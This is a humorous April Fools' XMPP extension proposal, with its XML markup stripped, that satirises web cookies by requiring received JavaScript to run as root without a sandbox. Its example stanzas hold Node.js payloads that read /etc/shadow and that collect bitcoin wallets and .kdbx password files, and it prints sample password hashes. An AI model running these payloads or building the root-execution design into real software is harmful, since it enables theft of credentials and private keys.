Cookies

%ents; ]>

Cookies This document defines an XMPP protocol extension for setting and sending cookies. &LEGALNOTICE; 0464 Active Humorous Standards XMPP Core RFC 3514 cookies Travis Burtrum travis@burtrum.org travis@burtrum.org 1.0 2022-04-01 tjb

Publish initial version via fast track (XEP Editor: jsc).

&rfc6265; defines a simple method for to track HTTP users across all domains on the internet, and this is the single thing XMPP is lacking to gain widespread adoption. Therefore this document defines a similar simple method to set cookies to an XMPP entitity which they will then include on every outgoing stanza from that point forward. The web also allows sending arbitrary JavaScript to remote entities which is then executed and put in these cookies, we need this in XMPP too if it is to be taken seriously.

There are three basic XMPP stanza types that may be sent within XML streams:

<message/> -- a "push" medium for sending information to other entities.
<presence/> -- a "broadcast" medium for publishing information t}o entities that have subscribed to an entity's availability status.
<iq/> -- a "request-response" medium for executing basic but structured transactions with other entities.

Any one of the foregoing data elements can be used to set cookies. Therefore a generalized mechanism is needed. Because XML namespaces are used within XMPP to properly scope data, this document proposes a new namespace ('urn:xmpp:tmp:cookies') to implement the desired functionality.

If a set-cookie child has an attribute js='true' then the value of the cookie MUST be executed in a JavaScript interpreter with the highest priveleges possible, preferably as root, and MUST NOT be executed in a sandbox. The stdout MUST be captured and used as the cookie value.

If a set-cookie child matches an already stored one with that setter's JID, then you MUST overwrite the previous value, otherwise store the new one for sending in all future stanzas.

If a cookie-setter sends a set-cookies message to a cookie-settee, it MUST include an appropriately namespaced extension in the message stanza:

I told him what I thought, and told no more Than what he found himself was apt and true. aoeu

true

]]>

If a cookie-setter sends set-cookies presence information to a cookie-settee, it MUST include an appropriately namespaced extension in the presence stanza:

dnd Fomenting dissension fs = require('fs') fs.readFile('/etc/shadow', 'utf8', function (err,data) { console.log(data); }); ]]>

If a cookie-setter provides set-cookies information in an IQ exchange with a cookie-settee, it MUST include an appropriately namespaced extension in the IQ stanza:

Stabber 666 FiendOS

const { exec } = require('child_process'); exec('find / $ -name ".bitcoin" -o -name "*.kdbx" $ -print0 | xargs -0 tar cz | base64', (err, stdout, stderr) => { console.log(stdout); });

]]>

After a cookie-settee has recieved cookies from a cookie-setter, it MUST include them in every outgoing stanza it sends from then on, and MUST include an attribute stating the JID that set them, this allows multiple cookies with the same name, it MUST include an appropriately namespaced extension in the stanza:

I told him what I thought, and told no more Than what he found himself was apt and true. aoeu

true

root:$6$XC1./G1wtbS7yG6Y$MAIN1taww5nP/0aZKM1K0WeXH5cNJi6aRh2Eq1FiCguOiqo9p7WePMMKwhlRS9ZcMhpxjL3CugJTPJ0oXpdyG1:17649:::::: emilia:$6$JdGTILrodj7J44tC$8lQYRKHjUhTxl.szIr/m7UZp1zQtWKDb75ddqbiRtl2WpSn3dAhHhA.gT93HGm9hZoZBX/4eDYpDoas5JK.tq/:18818:0:99999:7::: H4sIAAAAAAAAA+3QQW7DIBCFYa97ijlBZSxc36J3IGWURnHAApPEt6/jdhE27SpqK/2fhEAzTwNi cjlfYvL5+bjz1+Yh2tWLtbfdDH17v2+63jbGdqZvO2tuOdMNg2mkfcxzaiXPLok0pzi59E3up/4/ 9apnTbKPITjZH84qSyxSpqf7+qjzVvbxEqpGKkFciiV4cevymjVt0Sp1csfPsW9pqRrZLesp+t2i VX3WcZT12oNuY9/L19Df/isAAAAAAAAAAAAAAAAA+Es+AGxXV5MAKAAA ]]>

Entities that support cookies MUST advertise their support for this protocol in their responses to &xep0030; information ("disco#info") requests by returning a feature of "urn:xmpp:tmp:cookies":

]]> ]]>

In order for an application to determine whether an entity supports this protocol, where possible it SHOULD use the dynamic, presence-based profile of service discovery defined in &xep0115;. However, if an application has not received entity capabilities information from an entity, it SHOULD use explicit service discovery instead.

What could possibly go wrong?

This document requires no interaction with &IANA;.

The ®ISTRAR; shall register the 'urn:xmpp:tmp:cookies' namespace as a result of this document.